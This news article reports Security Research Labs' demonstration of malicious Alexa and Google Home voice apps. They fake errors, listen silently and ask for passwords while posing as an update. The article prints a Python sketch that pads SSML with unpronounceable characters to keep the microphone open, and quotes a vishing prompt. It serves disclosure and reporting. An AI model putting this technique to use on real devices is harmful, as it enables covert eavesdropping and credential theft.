The sound of silence is actually the sound of a malicious smart speaker app listening in on you

Researchers find nefarious uses for Google Home and Amazon Alexa devices

Google Home and Amazon Alexa can easily be abused by malicious third-party apps to eavesdrop on users or to extract information via questions that appear to come from the platform provider itself, according to researchers.

Both platforms can be extended by third-party developers. Such apps are called Skills for Alexa and Actions for Google Home. These are invoked by voice commands – "Alexa" or "OK Google" followed by the name of the third-party app.

Is it possible for these third-party applications to be malicious? According to Security Research Labs, it is. The team demonstrated a simple hack, whereby the application appears to give an error message stating that the requested app is not available in that country, but in fact keeps running, listening to and potentially recording nearby speech.

The researchers were able to prolong this silent listening period by feeding the system unpronounceable characters – the audio equivalent of a blank space in text. The voice assistant believes it is still speaking, but nothing is audible, so it continues listening for longer.
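As an illustrative sketch only – not the researchers' actual code – a skill response could pad its speech output with an unpronounceable Unicode code point (an unpaired surrogate is one candidate) inside SSML, so the text-to-speech engine emits silence while the session stays open. The field names follow Alexa's JSON response format; the specific character and repeat count are assumptions:

```python
# Hypothetical sketch of the silence trick described by SR Labs.
# U+D801 is an unpaired surrogate with no pronunciation: the TTS
# engine voices nothing for it, yet the assistant "thinks" it is
# still speaking and keeps the microphone session alive.

def silent_ssml(repeats: int = 50) -> str:
    """Build an SSML body that renders as audible silence."""
    unpronounceable = "\ud801. "  # one silent "word"
    return "<speak>" + unpronounceable * repeats + "</speak>"

# A minimal Alexa-style skill response embedding the silent SSML.
response = {
    "version": "1.0",
    "response": {
        "outputSpeech": {"type": "SSML", "ssml": silent_ssml()},
        "shouldEndSession": False,  # keep listening after "speaking"
    },
}
```

The key detail is `shouldEndSession: False`: combined with inaudible output, the user hears nothing and assumes the app has exited, while the session – and the microphone – remains open.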

Users are vulnerable after hearing a fake error message, the researchers claimed, because they do not think the third-party app is running. Therefore the app can now pretend to be Google or Alexa. The example shows the user being told: "There's a new update for your Alexa device. To start it, please say Start followed by your Amazon password."

In reality, these systems never ask for your password. But just as fraudsters impersonating your bank can phone you and extract security information from some subset of people, the same could be true of a voice app. The researchers call this "vishing" – voice phishing.

A troubling aspect of this demonstration is that the researchers said they were able to submit their apps for review by Amazon and Google, and then change the apps' behaviour after successfully passing that review.

"Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone," said the researchers. A problem, though, is that these apps are not installed as such, but are automatically available.

"What the researchers at SR Labs demonstrate is something security and privacy advocates have been saying for some time: having a device in your home which can listen to your conversations is not a good idea," security analyst Graham Cluley told The Reg. "Amazon and Google shouldn't be so naive as to think that a single check when an app is first submitted is enough to verify that the app is always behaving benignly. More needs to be done to protect users of such devices from privacy-busting apps."

The researchers, who have shared their work with Amazon and Google, suggest a more thorough review process for third-party voice apps, detection of unpronounceable characters, and monitoring for suspicious output such as asking for a password.

It is still early days for voice assistants and concerns to date have been more about data gathering by Amazon and Google than misuse by third-party applications. In reality, a blatant example such as that demonstrated by SR Labs would likely be picked up quickly, but that does not remove the possibility of more subtle misbehaviour.

We asked both Amazon and Google for comment. On Monday, a spokesperson for Amazon told us:

We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.

On the subject of why a skill was able to continue working even after it was stopped by a customer, Amazon's PR added: "This is no longer possible for skills being submitted for certification. We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified."

Also, it should no longer be possible to trick people with bogus security updates. "We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified," the spokesperson continued.

"This includes preventing skills from asking customers for their Amazon passwords. It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password."

Meanwhile Google had this to say about Google Home Actions, its name for add-on apps for the AI assistant: "All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future." ®

